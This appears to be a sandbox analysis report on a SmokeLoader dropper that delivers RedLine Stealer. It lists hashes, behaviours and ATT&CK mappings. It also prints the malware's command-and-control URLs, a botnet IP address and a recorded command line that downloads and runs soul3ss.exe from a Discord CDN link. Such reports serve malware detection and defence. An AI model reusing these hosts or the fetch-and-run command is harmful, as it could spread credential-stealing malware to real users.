redline | 9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1

Analysis

max time kernel
164s
max time network
137s
platform
windows10_x64
resource
win10v20210408
submitted
23-08-2021 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe
Size

236KB
MD5

5c65af376bff0067a2109686755b36db
SHA1

97fe279e6107f0b1b8a6b34073f21b85b71e9a38
SHA256

9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1
SHA512

97d71490c89c1218fede0ab9f8b3bc859649c676348e992faee297fa7f7f4693d5d260a879111243f9b3e2c51b27f2c40b6b531d991de41055ebaa0cf7098a1c

Score

10^/10

redline smokeloader @soul3ss backdoor discovery infostealer spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

@soul3ss

188.130.139.12:30376

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\19415\soul3ss.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\19415\soul3ss.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

3E90.exeextd.exeextd.exeextd.exesoul3ss.exeextd.exe

pid process

1524 3E90.exe
3604 extd.exe
3044 extd.exe
2152 extd.exe
2384 soul3ss.exe
3852 extd.exe

pid	process
1524	3E90.exe
3604	extd.exe
3044	extd.exe
2152	extd.exe
2384	soul3ss.exe
3852	extd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe	upx

Deletes itself 1 IoCs

Processes:

pid process

3052
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
3052

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe

pid	process
784	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe
784	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052
3052

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3052
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe

pid process

784 9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe

pid	process
3052

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

soul3ss.exe

description	pid	process
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeDebugPrivilege	2384	soul3ss.exe
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052
Token: SeShutdownPrivilege	3052
Token: SeCreatePagefilePrivilege	3052

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

3E90.execmd.exe

description	pid	process	target process
PID 3052 wrote to memory of 1524	3052		3E90.exe
PID 3052 wrote to memory of 1524	3052		3E90.exe
PID 1524 wrote to memory of 820	1524	3E90.exe	cmd.exe
PID 1524 wrote to memory of 820	1524	3E90.exe	cmd.exe
PID 820 wrote to memory of 3604	820	cmd.exe	extd.exe
PID 820 wrote to memory of 3604	820	cmd.exe	extd.exe
PID 820 wrote to memory of 3044	820	cmd.exe	extd.exe
PID 820 wrote to memory of 3044	820	cmd.exe	extd.exe
PID 820 wrote to memory of 2152	820	cmd.exe	extd.exe
PID 820 wrote to memory of 2152	820	cmd.exe	extd.exe
PID 820 wrote to memory of 2384	820	cmd.exe	soul3ss.exe
PID 820 wrote to memory of 2384	820	cmd.exe	soul3ss.exe
PID 820 wrote to memory of 2384	820	cmd.exe	soul3ss.exe
PID 820 wrote to memory of 3852	820	cmd.exe	extd.exe
PID 820 wrote to memory of 3852	820	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe
"C:\Users\Admin\AppData\Local\Temp\9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:784

C:\Users\Admin\AppData\Local\Temp\3E90.exe
C:\Users\Admin\AppData\Local\Temp\3E90.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\3F9C.bat C:\Users\Admin\AppData\Local\Temp\3E90.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:820

C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3604

C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3044

C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:2152

C:\Users\Admin\AppData\Local\Temp\19415\soul3ss.exe
soul3ss.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\19415\soul3ss.exe
MD5
411ca7ba89ae45e92f9ed4663f903335

SHA1
6360b07844800b8e6e6e2b11ee3c8d051c4a2e96

SHA256
6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009

SHA512
bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

Download Submit
C:\Users\Admin\AppData\Local\Temp\19415\soul3ss.exe
MD5
411ca7ba89ae45e92f9ed4663f903335

SHA1
6360b07844800b8e6e6e2b11ee3c8d051c4a2e96

SHA256
6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009

SHA512
bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

Download Submit
C:\Users\Admin\AppData\Local\Temp\3E90.exe
MD5
e16f915796d4762014fc3864d4444ac3

SHA1
819364784cf0d3fe440b6c9a3950de7fa093e805

SHA256
65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd

SHA512
1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3E90.exe
MD5
e16f915796d4762014fc3864d4444ac3

SHA1
819364784cf0d3fe440b6c9a3950de7fa093e805

SHA256
65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd

SHA512
1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\3F9C.bat
MD5
7e7270dab376a4fb58110f37972089d9

SHA1
68a17f52b885b168e89d7c6aba19b512fd3bfe59

SHA256
47d1fb9eb11c420d408d86a4c2ac7534efec9b05aa4ad2cac20bbe605969d0ae

SHA512
30b122d7d9fefe7acedc515bd39ffacb348e51ae58edfc92a625da4ac537ec6d68f54b9a1be68fee07c5c4f87a055ee858ff9e80fbf8e8d0d1bb91fa8c66fd07

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F8A.tmp\3F9B.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
memory/784-115-0x0000000000400000-0x00000000023A5000-memory.dmp

Filesize
31.6MB

Download
memory/784-114-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/820-120-0x0000000000000000-mapping.dmp

Download
memory/1524-117-0x0000000000000000-mapping.dmp

Download
memory/2152-127-0x0000000000000000-mapping.dmp

Download
memory/2384-139-0x0000000004B50000-0x0000000004B51000-memory.dmp

Filesize
4KB

Download
memory/2384-143-0x0000000005930000-0x0000000005931000-memory.dmp

Filesize
4KB

Download
memory/2384-149-0x0000000008F00000-0x0000000008F01000-memory.dmp

Filesize
4KB

Download
memory/2384-148-0x00000000087A0000-0x00000000087A1000-memory.dmp

Filesize
4KB

Download
memory/2384-147-0x0000000008620000-0x0000000008621000-memory.dmp

Filesize
4KB

Download
memory/2384-134-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/2384-136-0x0000000004F20000-0x0000000004F21000-memory.dmp

Filesize
4KB

Download
memory/2384-137-0x0000000005A30000-0x0000000005A31000-memory.dmp

Filesize
4KB

Download
memory/2384-138-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/2384-146-0x00000000081F0000-0x00000000081F1000-memory.dmp

Filesize
4KB

Download
memory/2384-140-0x0000000004D30000-0x0000000004D31000-memory.dmp

Filesize
4KB

Download
memory/2384-141-0x0000000004A20000-0x0000000004F1E000-memory.dmp

Filesize
5.0MB

Download
memory/2384-142-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/2384-129-0x0000000000000000-mapping.dmp

Download
memory/2384-144-0x00000000082D0000-0x00000000082D1000-memory.dmp

Filesize
4KB

Download
memory/2384-145-0x00000000089D0000-0x00000000089D1000-memory.dmp

Filesize
4KB

Download
memory/3044-125-0x0000000000000000-mapping.dmp

Download
memory/3052-116-0x0000000001250000-0x0000000001266000-memory.dmp

Filesize
88KB

Download
memory/3604-122-0x0000000000000000-mapping.dmp

Download
memory/3852-131-0x0000000000000000-mapping.dmp

Download